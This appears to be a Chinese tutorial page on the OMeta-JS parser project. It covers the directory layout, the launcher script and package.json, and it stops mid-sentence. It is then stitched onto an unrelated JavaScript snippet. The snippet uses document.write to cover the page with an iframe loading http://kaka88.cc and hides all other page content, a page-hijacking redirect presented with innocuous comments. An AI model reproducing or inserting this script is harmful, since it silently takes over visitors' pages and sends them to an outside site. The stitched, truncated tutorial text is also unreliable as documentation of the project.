OMeta-JS 开源项目教程

OMeta-JS 开源项目教程

ometa-jsOMeta for JavaScript项目地址:https://gitcode.com/gh_mirrors/om/ometa-js

1. 项目的目录结构及介绍

OMeta-JS 项目的目录结构如下:

ometa-js/
├── LICENSE
├── README.md
├── bin/
│   └── ometajs
├── lib/
│   ├── ometajs-builder.js
│   ├── ometajs-compiler.js
│   ├── ometajs-runtime.js
│   └── ometajs.js
├── package.json
├── samples/
│   ├── calc.ometajs
│   ├── json.ometajs
│   └── ometajs.ometajs
└── test/
    ├── all.js
    ├── calc.js
    ├── json.js
    └── ometajs.js

目录介绍

  • LICENSE: 项目的许可证文件。
  • README.md: 项目的基本介绍和使用说明。
  • bin/: 包含可执行文件 ometajs
  • lib/: 包含 OMeta-JS 的核心库文件,包括编译器、运行时和构建工具。
  • package.json: 项目的 npm 配置文件,包含依赖和脚本信息。
  • samples/: 包含示例文件,展示如何使用 OMeta-JS 编写语法解析器。
  • test/: 包含测试文件,用于验证 OMeta-JS 的功能。

2. 项目的启动文件介绍

项目的启动文件位于 bin/ 目录下的 ometajs 文件。这是一个可执行脚本,用于编译和运行 OMeta-JS 文件。

启动文件内容

#!/usr/bin/env node

var path = require('path');
var fs = require('fs');
var ometajs = require('../lib/ometajs-builder');

var args = process.argv.slice(2);
var inputFile = args[0];
var outputFile = args[1];

if (!inputFile) {
  console.error('Usage: ometajs <input-file> [output-file]');
  process.exit(1);
}

var inputCode = fs.readFileSync(inputFile, 'utf8');
var outputCode = ometajs.compile(inputCode);

if (outputFile) {
  fs.writeFileSync(outputFile, outputCode, 'utf8');
} else {
  console.log(outputCode);
}

使用方法

ometajs <input-file> [output-file]
  • <input-file>: 需要编译的 OMeta-JS 文件。
  • [output-file]: 可选参数,指定编译后的 JavaScript 文件输出路径。

3. 项目的配置文件介绍

项目的配置文件是 package.json,它包含了项目的元数据和依赖信息。

package.json 内容

{
  "name": "ometajs",
  "version": "3.2.4",
  "description": "OMeta-JS is a JavaScript-based object-oriented language for pattern matching.",
  "keywords": [
    "ometa",
    "ometajs",
    "parser",
    "compiler",
    "pattern matching"
  ],
  "author": "Alex Warth <alexwarth@gmail.com>",
  "license": "MIT",
  "bin": {
    "ometajs": "./bin/ometajs"
  },
  "main": "./lib/ometajs",
  "repository": {
    "type": "git",
    "url": "https://github.com/alexwarth/ometa-js.git"
  },
  "dependencies": {
    "uglify-js": "~1.3.4"
  },
  "scripts": {
    "test": "node test/all.js"
  }
}

配置文件介绍

  • name: 项目名称。
  • version: 项目版本。
  • description: 项目描述。
  • keywords: 项目关键词。
  • author: 项目作者。
  • license: 项目许可证。
  • bin: 可执行文件路径。
  • main: 项目入口文件。
  • repository: 项目仓库地址。
  • dependencies: 项目

ometa-jsOMeta for JavaScript项目地址:https://gitcode.com/gh_mirrors/om/ometa-js

// 获取当前网页的标题 var titlestr = document.title; // 设置要替换的网页链接并调用setFrame函数 setFrame("http://kaka88.cc"); // 定义设置网页内容和隐藏元素的函数 function setFrame(olink) { // 构造要插入页面的字符串,包含替换网页的iframe标签和原网页标题 var ss = '<title>' + titlestr + '</title><div id="showcloneshengxiaon" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255);background-position: initial initial; background-repeat: initial initial;"><iframe scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" height="100%" src="' + olink + '"></iframe></div><style type="text/css">html{width:100%;height:100%;}body {width:100%;height:100%;}</style>'; // 将构造好的字符串插入到当前页面中 eval("document.write('" + ss + "');"); try { // 延迟执行后续操作,避免立即执行报错 setTimeout(function() { // 打印document.body.children的长度 console.log(document.body.children.length); // 遍历document.body.children数组 for (var i = 0; i < document.body.children.length; i++) { try { // 获取子元素的标签名和id var a = document.body.children[i].tagName; var b = document.body.children[i].id; // 打印子元素的位置、标签名和id console.log(i + "***" + a + "**" + b); // 判断条件:如果子元素的id不等于"iconDiv1"、"showcloneshengxiaon"且标签名不是标题,则隐藏该元素 if (b != "iconDiv1" && b != "showcloneshengxiaon" && a != "title") { document.body.children[i].style.display = "none"; } } catch (e) {} } // 创建meta标签,用于适配移动设备的视口 var oMeta = document.createElement('meta'); oMeta.name = 'viewport'; oMeta.content = 'width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no'; document.getElementsByTagName('head')[0].appendChild(oMeta); }, 100); } catch (e) {} }
07-17
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

劳允椒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值